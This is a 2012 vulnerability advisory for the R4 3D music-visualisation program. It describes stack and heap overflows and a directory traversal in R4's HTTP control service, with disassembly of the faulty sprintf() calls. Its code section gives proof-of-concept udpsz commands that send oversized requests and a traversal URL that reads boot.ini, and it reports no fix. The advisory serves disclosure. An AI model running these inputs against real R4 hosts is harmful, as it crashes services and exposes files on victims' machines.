R4 versions 1.25 and below suffer from stack overflows, a heap overflow, and a directory traversal vulnerability.
a919dc7d26e3287c253dbb8f2c37dabb814060049330f4baed7bb506726bcdee
#######################################################################
Luigi Auriemma
Application: R4
http://r4.rabidhamster.org/R4/
Versions: <= 1.25
Platforms: Windows
Bugs: A] stack overflow
B] heap overflow
C] directory traversal
D] screenshot stack overflow
Exploitation: remote
Date: 09 Feb 2012
Author: Luigi Auriemma
e-mail: aluigi@autistici.org
web: aluigi.org
#######################################################################
1) Introduction
2) Bugs
3) The Code
4) Fix
#######################################################################
===============
1) Introduction
===============
From vendor's website:
"R4 is a standalone OpenGL accelerated program which aims to produce
animated 3D graphics in real-time that twist and turn with the music."
It's very used in parties and other events in which are needed 3d
animations based on the current music.
#######################################################################
=======
2) Bugs
=======
R4 has an http service disabled by default which allows to control it
from remote, all the following vulnerabilities are located in this
component.
-----------------
A] stack overflow
-----------------
Buffer overflow caused by the calling of sprintf() for generating a log
string using the HTTP arguments received from the client in a stack
buffer of 2 kilobytes:
0041ECD0 /$ 8B5424 04 MOV EDX,DWORD PTR SS:[ESP+4]
0041ECD4 |. 81EC 00080000 SUB ESP,800
0041ECDA |. 85D2 TEST EDX,EDX
0041ECDC |. 75 05 JNZ SHORT R4.0041ECE3
0041ECDE |. BA 349C4B00 MOV EDX,R4.004B9C34
0041ECE3 |> 8B8C24 08080000 MOV ECX,DWORD PTR SS:[ESP+808]
0041ECEA |. 85C9 TEST ECX,ECX
0041ECEC |. 75 05 JNZ SHORT R4.0041ECF3
0041ECEE |. B9 349C4B00 MOV ECX,R4.004B9C34
0041ECF3 |> 8B8424 0C080000 MOV EAX,DWORD PTR SS:[ESP+80C]
0041ECFA |. 85C0 TEST EAX,EAX
0041ECFC |. 74 2E JE SHORT R4.0041ED2C
0041ECFE |. 53 PUSH EBX
0041ECFF |. 8A18 MOV BL,BYTE PTR DS:[EAX]
0041ED01 |. 84DB TEST BL,BL
0041ED03 |. 5B POP EBX
0041ED04 |. 74 26 JE SHORT R4.0041ED2C
0041ED06 |. 50 PUSH EAX
0041ED07 |. 51 PUSH ECX
0041ED08 |. 52 PUSH EDX
0041ED09 |. 8D4424 0C LEA EAX,DWORD PTR SS:[ESP+C]
0041ED0D |. 68 60654B00 PUSH R4.004B6560 ; "]%s>%s [%s]"
0041ED12 |. 50 PUSH EAX ; stack buffer
0041ED13 |. E8 7B3C0000 CALL R4.00422993 ; sprintf()
0041ED18 |. 83C4 14 ADD ESP,14
0041ED1B |. 8D5424 00 LEA EDX,DWORD PTR SS:[ESP]
0041ED1F |. 52 PUSH EDX
0041ED20 |. E8 2BFEFFFF CALL R4.0041EB50
0041ED25 |. 81C4 04080000 ADD ESP,804
0041ED2B |. C3 RETN
----------------
B] heap overflow
----------------
Heap overflow/corruption caused by a long HTTP URI.
----------------------
C] directory traversal
----------------------
Directory traversal exploitable through the "loadfile" script command
that can be executed from left_console.html and allows to view the
files on the disk in which is installed the software.
----------------------------
D] screenshot stack overflow
----------------------------
Stack overflow through the "miniscreenshot" command:
0040B980 . 8B5424 04 MOV EDX,DWORD PTR SS:[ESP+4]
0040B984 . 81EC 04010000 SUB ESP,104
...
0040BA1F . 8B15 109C4B00 MOV EDX,DWORD PTR DS:[4B9C10]
0040BA25 . 56 PUSH ESI
0040BA26 . 52 PUSH EDX
0040BA27 . 8D4424 14 LEA EAX,DWORD PTR SS:[ESP+14]
0040BA2B . 68 F02A4B00 PUSH R4.004B2AF0 ; "%s/scene/%s.jpg"
0040BA30 . 50 PUSH EAX ; stack buffer
0040BA31 . E8 5D6F0100 CALL R4.00422993 ; sprintf()
#######################################################################
===========
3) The Code
===========
http://aluigi.org/testz/udpsz.zip
A]
udpsz -T -b a -c "GET /?" 0 -c "HTTP/1.0\r\n\r\n" -1 SERVER 8888 3000
B]
udpsz -T -b a -c "GET /" 0 -c "HTTP/1.0\r\n\r\n" -1 SERVER 8888 20000
C]
http://SERVER:8888/left_console.html?cmd=loadfile([../../../../../boot.ini])
D]
udpsz -T -b a -c "GET /left_console.html?cmd=miniscreenshot([" 0 -c "]) HTTP/1.0\r\n\r\n" -1 SERVER 8888 500
#######################################################################
======
4) Fix
======
No fix.
#######################################################################